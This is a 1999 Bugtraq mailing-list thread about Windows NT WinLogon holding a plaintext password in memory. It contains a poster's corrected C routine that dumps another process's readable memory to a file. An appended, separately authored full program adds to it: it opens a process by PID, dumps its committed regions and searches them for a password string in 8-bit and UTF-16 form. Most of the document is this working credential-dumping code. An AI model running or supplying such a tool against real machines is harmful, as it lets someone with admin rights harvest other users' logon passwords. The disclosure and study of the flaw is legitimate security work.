[13010] in bugtraq
Re: NT WinLogon VM contains plaintext password visible in admin m
daemon@ATHENA.MIT.EDU (Robert Horvick)
Fri Dec 17 13:05:23 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Message-Id: <A7CB8F787221D2119ABB0008C724549601777BAF@exchange2.greatplains.com>
Date: Thu, 16 Dec 1999 13:11:21 -0600
Reply-To: Robert Horvick <rhorvick@GREATPLAINS.COM>
From: Robert Horvick <rhorvick@GREATPLAINS.COM>
X-To: "Jorge_Miguel_Pinto@BancoBPI.PT" <Jorge_Miguel_Pinto@BancoBPI.PT>
To: BUGTRAQ@SECURITYFOCUS.COM
Actually, there is a large bug in the code (well, it works just as well, but
thousands of times faster and is more correct):
There is no reason to look beyond the application min and max address range
and no reason to read in anything other than page sizes (since a
VirtualAlloc will always round to at least the next largest page size).
This was how I should have written it to begin with but I got lazy :)
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

/* Dump every readable page of hProc between the minimum and maximum
 * application addresses to szPath. Contiguous readable pages are written
 * as one run, preceded by an "offset" line giving where the run starts.
 * Returns the number of bytes dumped. */
DWORD DumpMemory(HANDLE hProc, LPSTR szPath)
{
    LPSTR lpOffset = 0;
    LPSTR lpBuf = 0;
    SIZE_T dwRead = 0;          /* ReadProcessMemory reports bytes read as SIZE_T */
    BOOL bLastRead = FALSE;
    DWORD dwDumpedBytes = 0;
    SYSTEM_INFO si = {0};
    FILE *f = 0;

    f = fopen(szPath, "wb");
    if(f)
    {
        GetSystemInfo(&si);
        lpBuf = (LPSTR)malloc(si.dwPageSize + 1);
        if(!lpBuf)
        {
            fclose(f);
            return 0;
        }
        /* Walk the address space one page at a time. The for increment is
         * the only place lpOffset advances; a second increment inside the
         * body would skip the page after every readable one. */
        for(lpOffset = (LPSTR)si.lpMinimumApplicationAddress;
            lpOffset <= (LPSTR)si.lpMaximumApplicationAddress;
            lpOffset += si.dwPageSize)
        {
            if(ReadProcessMemory(hProc, lpOffset, lpBuf, si.dwPageSize, &dwRead))
            {
                if(!bLastRead)
                {
                    /* Start of a new readable run: record where it begins. */
                    fprintf(f, "\noffset %p\n", lpOffset);
                    bLastRead = TRUE;
                }
                fwrite(lpBuf, 1, dwRead, f);
                dwDumpedBytes += (DWORD)dwRead;
            }
            else
            {
                /* Unreadable page: the next readable page starts a new run. */
                bLastRead = FALSE;
            }
        }
        free(lpBuf);
        fclose(f);
    }
    else
    {
        fprintf(stderr, "Unable to open %s\n", szPath);
    }
    return dwDumpedBytes;
}
-----Original Message-----
From: Jorge_Miguel_Pinto@BancoBPI.PT
[mailto:Jorge_Miguel_Pinto@BancoBPI.PT]
Sent: Thursday, December 16, 1999 9:48 AM
To: rhorvick@GREATPLAINS.COM
Cc: BUGTRAQ@SECURITYFOCUS.COM
Subject: RE: NT WinLogon VM contains plaintext password visible in admin mode
I am sorry, but I only read this today...
There is a small bug in this code...
<! LPSTR lpOffset = (void*)1;
!> LPSTR lpOffset = (LPSTR)1;
This also doesn't work on Windows 2000 Professional, SRV and Adv Srv.
Greetings,
J.
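An added example, not code from the original post or from either poster: the same dump, but instead of probing every page in the application range with ReadProcessMemory, it asks the kernel which regions are actually committed and readable with VirtualQueryEx and reads each region in one call, skipping MEM_FREE, MEM_RESERVE, PAGE_NOACCESS and PAGE_GUARD regions that would fail (or trip a guard page). It also searches each region for a needle in both 8-bit and UTF-16LE form, since a password may sit in memory as either. The function names (DumpRegions, find_secret) and the command line are my own; the Win32 calls are the standard ones and compile only under _WIN32, the search helper is portable.

```c
/* Added example: region-walking process memory dump plus a needle search.
 * Names below (DumpRegions, find_secret, the argv layout) are assumptions
 * for this example, not from the original post. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stddef.h>

/* Find the first occurrence of needle in buf, either as 8-bit characters
 * or as UTF-16LE (each ASCII byte followed by 0x00). Returns the byte
 * offset of the hit, or -1 if absent. Portable; no Win32 needed. */
long find_secret(const unsigned char *buf, size_t len, const char *needle)
{
    size_t nlen = strlen(needle);
    size_t i, j;

    if (nlen == 0 || len < nlen)
        return -1;

    /* Pass 1: the needle as 8-bit characters. */
    for (i = 0; i + nlen <= len; i++)
        if (memcmp(buf + i, needle, nlen) == 0)
            return (long)i;

    /* Pass 2: the needle widened to UTF-16LE. */
    for (i = 0; i + 2 * nlen <= len; i++) {
        for (j = 0; j < nlen; j++)
            if (buf[i + 2 * j] != (unsigned char)needle[j] || buf[i + 2 * j + 1] != 0)
                break;
        if (j == nlen)
            return (long)i;
    }
    return -1;
}

#ifdef _WIN32
#include <windows.h>

/* Dump every committed, readable region of hProc to f, each preceded by an
 * "offset <base> size <n>" line, and return the total bytes written. If
 * needle is non-NULL, report which region contains it and where. */
SIZE_T DumpRegions(HANDLE hProc, FILE *f, const char *needle)
{
    SYSTEM_INFO si;
    MEMORY_BASIC_INFORMATION mbi;
    LPBYTE p;
    SIZE_T total = 0;

    GetSystemInfo(&si);
    p = (LPBYTE)si.lpMinimumApplicationAddress;
    while (p < (LPBYTE)si.lpMaximumApplicationAddress) {
        if (VirtualQueryEx(hProc, p, &mbi, sizeof(mbi)) == 0)
            break;                                   /* query failed: stop */
        if (mbi.State == MEM_COMMIT &&
            !(mbi.Protect & PAGE_GUARD) &&
            !(mbi.Protect & PAGE_NOACCESS)) {
            unsigned char *buf = (unsigned char *)malloc(mbi.RegionSize);
            SIZE_T got = 0;
            if (buf && ReadProcessMemory(hProc, mbi.BaseAddress, buf,
                                         mbi.RegionSize, &got) && got) {
                long hit = needle ? find_secret(buf, got, needle) : -1;
                fprintf(f, "\noffset %p size %lu\n",
                        mbi.BaseAddress, (unsigned long)got);
                fwrite(buf, 1, got, f);
                total += got;
                if (hit >= 0)
                    fprintf(stderr, "needle found at %p\n",
                            (void *)((LPBYTE)mbi.BaseAddress + hit));
            }
            free(buf);
        }
        /* Jump straight to the next region; no per-page probing. */
        p = (LPBYTE)mbi.BaseAddress + mbi.RegionSize;
    }
    return total;
}

int main(int argc, char **argv)
{
    HANDLE hProc;
    FILE *f;
    SIZE_T n;

    if (argc < 3) {
        fprintf(stderr, "usage: %s <pid> <outfile> [needle]\n", argv[0]);
        return 1;
    }
    /* PROCESS_VM_READ for ReadProcessMemory, PROCESS_QUERY_INFORMATION
     * for VirtualQueryEx. */
    hProc = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, FALSE,
                        (DWORD)strtoul(argv[1], NULL, 10));
    if (!hProc) {
        fprintf(stderr, "OpenProcess failed: %lu\n", GetLastError());
        return 1;
    }
    f = fopen(argv[2], "wb");
    if (!f) {
        fprintf(stderr, "Unable to open %s\n", argv[2]);
        CloseHandle(hProc);
        return 1;
    }
    n = DumpRegions(hProc, f, argc > 3 ? argv[3] : NULL);
    fclose(f);
    CloseHandle(hProc);
    printf("dumped %lu bytes\n", (unsigned long)n);
    return 0;
}
#endif
```

Opening a system process such as winlogon with PROCESS_VM_READ needs the rights the thread's subject line already implies (an administrator, with debug privilege), and the dump file then holds whatever secrets were in that process, so treat it as sensitive output.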